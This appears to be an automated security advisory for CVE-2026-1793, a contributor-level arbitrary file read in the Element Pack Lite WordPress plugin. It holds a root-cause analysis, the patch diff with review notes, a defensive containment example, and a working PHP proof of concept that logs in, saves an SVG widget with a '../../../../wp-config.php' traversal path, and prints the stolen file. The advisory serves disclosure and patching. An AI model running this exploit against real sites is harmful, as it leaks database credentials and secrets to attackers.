Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2026-1793: Element Pack Addons for Elementor <= 8.3.17 – Authenticated (Contributor+) Arbitrary File Read (bdthemes-element-pack-lite)

CVE ID: CVE-2026-1793
Severity: Medium (CVSS 6.5)
CWE: 22
Vulnerable Version: 8.3.17
Patched Version: 8.3.18
Disclosed: February 13, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1793:
This vulnerability is an authenticated arbitrary file read flaw in the Element Pack Addons for Elementor WordPress plugin. The SVG widget’s render_svg function lacks proper path validation, allowing contributors and higher-privileged users to read arbitrary server files. The CVSS score of 6.5 reflects the authentication requirement and confidentiality impact.

The root cause resides in the render_svg function within /modules/svg-image/widgets/svg-image.php. The vulnerable code (lines 854-864) processes user-supplied SVG file URLs and converts them to local file system paths without validating whether the resolved path stays within the intended upload directory: the function extracts the relative path from the URL and appends it directly to the base directory, so directory traversal sequences in that path take effect.

Exploitation requires an authenticated attacker with at least contributor-level access. The attacker crafts a malicious SVG widget configuration containing a file:// URL or a path traversal sequence in the svg_file parameter. When the widget renders, the render_svg function processes this input, converts it to a local path, and reads the file contents. The attacker can then exfiltrate sensitive files like wp-config.php, /etc/passwd, or other configuration files.

The patch introduces multiple defense layers. It adds a path traversal check by rejecting any relative_path containing ‘..’ sequences. The code now uses realpath() to resolve symbolic links and normalize paths. It verifies that the resolved real_path is within the real_base upload directory using strpos() comparison. The patch also adds an is_file() check to prevent directory listing. These changes ensure files are only read from within the designated upload directory.
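The root-cause and patch paragraphs above, as an added example that is not the plugin's code: the patched containment logic factored into one function and run against a constructed scratch upload directory, including a symlink case the excerpt does not show. It assumes a Unix host (for symlink()) and a made-up upload base URL, and it goes one step beyond the patch by refusing the upload root outright instead of leaving that to is_file().

```php
<?php
// Added example, not the plugin's code: the patched containment logic as one
// function, exercised against a scratch upload directory built on the fly.
// Returns the real path of a regular file inside $basedir, or null to refuse.
function resolve_upload_path(string $url, string $baseurl, string $basedir): ?string
{
    if (strpos($url, $baseurl) !== 0) {
        return null;                              // not under the upload URL
    }
    $relative = ltrim(substr($url, strlen($baseurl)), '/');
    if (strpos($relative, '..') !== false) {
        return null;                              // cheap reject of '..' sequences
    }
    $candidate = $basedir . ($relative !== '' ? '/' . $relative : '');
    $real_path = realpath($candidate);            // false if missing; follows symlinks
    $real_base = realpath($basedir);
    if ($real_path === false || $real_base === false) {
        return null;
    }
    // Authoritative check: the resolved path must lie strictly below the base.
    if (strpos($real_path, $real_base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return is_file($real_path) ? $real_path : null;
}

// Constructed layout: uploads/ok.svg inside, secret.txt outside, and
// uploads/link.svg as a symlink escaping the upload directory.
$root    = sys_get_temp_dir() . '/svgdemo_' . bin2hex(random_bytes(4));
$basedir = $root . '/uploads';
mkdir($basedir, 0700, true);
file_put_contents($basedir . '/ok.svg', '<svg/>');
file_put_contents($root . '/secret.txt', 'not for the widget');
symlink($root . '/secret.txt', $basedir . '/link.svg');
$baseurl = 'https://example.test/wp-content/uploads';  // assumed upload base URL

$cases = [
    '/ok.svg'            => 'allowed',  // legitimate upload
    '/../secret.txt'     => 'refused',  // stopped by the '..' check
    '/%2e%2e/secret.txt' => 'refused',  // not URL-decoded, so realpath() finds nothing
    '/link.svg'          => 'refused',  // symlink resolves outside the base
    ''                   => 'refused',  // the upload root: a directory
];
foreach ($cases as $suffix => $expected) {
    $got = resolve_upload_path($baseurl . $suffix, $baseurl, $basedir) === null ? 'refused' : 'allowed';
    printf("%-20s %-8s %s\n", $suffix === '' ? '(root)' : $suffix, $got, $got === $expected ? 'ok' : 'MISMATCH');
}
array_map('unlink', [$basedir . '/link.svg', $basedir . '/ok.svg', $root . '/secret.txt']);
rmdir($basedir);
rmdir($root);
```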

Successful exploitation exposes sensitive server files to authenticated attackers. This includes WordPress configuration files containing database credentials, secret keys, and API tokens. System files like /etc/passwd or SSH keys may also be accessible. While the vulnerability does not directly enable remote code execution, the exposed credentials often lead to complete site compromise through database access or privilege escalation.

Differential between vulnerable and patched code

Code Diff
--- a/bdthemes-element-pack-lite/bdthemes-element-pack-lite.php
+++ b/bdthemes-element-pack-lite/bdthemes-element-pack-lite.php
@@ -4,14 +4,14 @@
  * Plugin Name: Element Pack Lite - Addons for Elementor
  * Plugin URI: http://elementpack.pro/
  * Description: The all-new <a href="https://elementpack.pro/">Element Pack</a> brings incredibly advanced, and super-flexible widgets, and A to Z essential addons to the Elementor page builder for WordPress. Explore expertly-coded widgets with first-class support by experts.
- * Version: 8.3.17
+ * Version: 8.3.18
  * Author: BdThemes
  * Author URI: https://bdthemes.com/
  * Text Domain: bdthemes-element-pack
  * Domain Path: /languages
  * License: GPL3
  * Elementor requires at least: 3.28
- * Elementor tested up to: 3.34.4
+ * Elementor tested up to: 3.35.0
  */


@@ -82,7 +82,7 @@
 if ( ! element_pack_pro_installed() ) {

 	// Some pre defined value for easy use
-	define( 'BDTEP_VER', '8.3.17' );
+	define( 'BDTEP_VER', '8.3.18' );
 	define( 'BDTEP_TPL_DB_VER', '1.0.0' );
 	define( 'BDTEP__FILE__', __FILE__ );
 	if ( ! defined( 'BDTEP_TITLE' ) ) {
--- a/bdthemes-element-pack-lite/modules/svg-image/widgets/svg-image.php
+++ b/bdthemes-element-pack-lite/modules/svg-image/widgets/svg-image.php
@@ -854,14 +854,24 @@
 		if ( ! empty( $svg_file ) ) {
 			// Try to get the SVG file contents
 			if ( strpos( $svg_file, get_site_url() ) === 0 ) {
-				// Local file, convert URL to path
+				// Local file, convert URL to path with path traversal protection
 				$upload_dir = wp_upload_dir();
-				$baseurl = $upload_dir['baseurl'];
-				$basedir = $upload_dir['basedir'];
+				$baseurl    = $upload_dir['baseurl'];
+				$basedir    = $upload_dir['basedir'];
 				if ( strpos( $svg_file, $baseurl ) === 0 ) {
-					$svg_path = $basedir . substr( $svg_file, strlen( $baseurl ) );
-					if ( file_exists( $svg_path ) ) {
-						$svg_content = file_get_contents( $svg_path );
+					$relative_path = substr( $svg_file, strlen( $baseurl ) );
+					$relative_path = ltrim( $relative_path, '/' );
+					// Reject path traversal sequences
+					if ( strpos( $relative_path, '..' ) === false ) {
+						$svg_path  = $basedir . ( $relative_path !== '' ? '/' . $relative_path : '' );
+						$real_path = realpath( $svg_path );
+						$real_base = realpath( $basedir );
+						// Ensure resolved path is inside upload directory
+						if ( $real_path !== false && $real_base !== false && ( $real_path === $real_base || strpos( $real_path, $real_base . DIRECTORY_SEPARATOR ) === 0 ) ) {
+							if ( file_exists( $real_path ) && is_file( $real_path ) ) {
+								$svg_content = file_get_contents( $real_path );
+							}
+						}
 					}
 				}
 			}
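Review bot: the `file_exists( $real_path )` test inside the containment branch is redundant, because `realpath()` only returns a non-false value for a path that exists; `is_file( $real_path )` alone covers that line. Allowing `$real_path === $real_base` admits the upload root itself, which `is_file()` then rejects, so the equality branch could be dropped to make the intent clearer. The `'..'` substring rejection is defense in depth on top of the `realpath()` containment comparison, but note that it also refuses legitimate filenames containing two consecutive dots; the `strpos( $real_path, $real_base . DIRECTORY_SEPARATOR ) === 0` comparison is the check that actually enforces the boundary, and it is the one worth a unit test.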

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1793 - Element Pack Addons for Elementor <= 8.3.17 - Authenticated (Contributor+) Arbitrary File Read

$target_url = 'http://target-wordpress-site.com';
$username = 'contributor_user';
$password = 'contributor_pass';
$file_to_read = '../../../../wp-config.php';

// Step 1: Authenticate to WordPress
$login_url = $target_url . '/wp-login.php';
$cookie_file = tempnam(sys_get_temp_dir(), 'cve_');

$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    ]),
    CURLOPT_COOKIEJAR => $cookie_file,
    CURLOPT_COOKIEFILE => $cookie_file,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true
]);
$response = curl_exec($ch);

// Step 2: Extract nonce from Elementor editor page
$editor_url = $target_url . '/wp-admin/post-new.php?post_type=page';
curl_setopt_array($ch, [
    CURLOPT_URL => $editor_url,
    CURLOPT_HTTPGET => true
]);
$response = curl_exec($ch);

preg_match('/"nonce":"([a-f0-9]+)"/', $response, $matches);
$nonce = $matches[1] ?? '';

// Step 3: Create a page with malicious SVG widget
$create_page_url = $target_url . '/wp-admin/admin-ajax.php';
$widget_settings = json_encode([
    'svg_image' => [
        'svg_file' => [
            'url' => $target_url . '/wp-content/uploads/' . $file_to_read
        ]
    ]
]);

$post_data = [
    'action' => 'elementor_ajax',
    'actions' => json_encode([
        'action_id' => 'save_builder',
        'editor_post_id' => 'new',
        'data' => [
            'elements' => [[
                'id' => 'exploit_widget',
                'elType' => 'widget',
                'settings' => $widget_settings,
                'widgetType' => 'svg-image'
            ]]
        ]
    ]),
    '_nonce' => $nonce
];

curl_setopt_array($ch, [
    CURLOPT_URL => $create_page_url,
    CURLOPT_POSTFIELDS => $post_data
]);
$response = curl_exec($ch);

// Step 4: Extract file contents from response
preg_match('/<svg[^>]*>(.*?)<\/svg>/s', $response, $file_matches);
if (!empty($file_matches[1])) {
    echo "File contents:\n" . html_entity_decode($file_matches[1]);
} else {
    echo "Exploit failed. Check authentication and nonce.";
}

curl_close($ch);
unlink($cookie_file);

?>
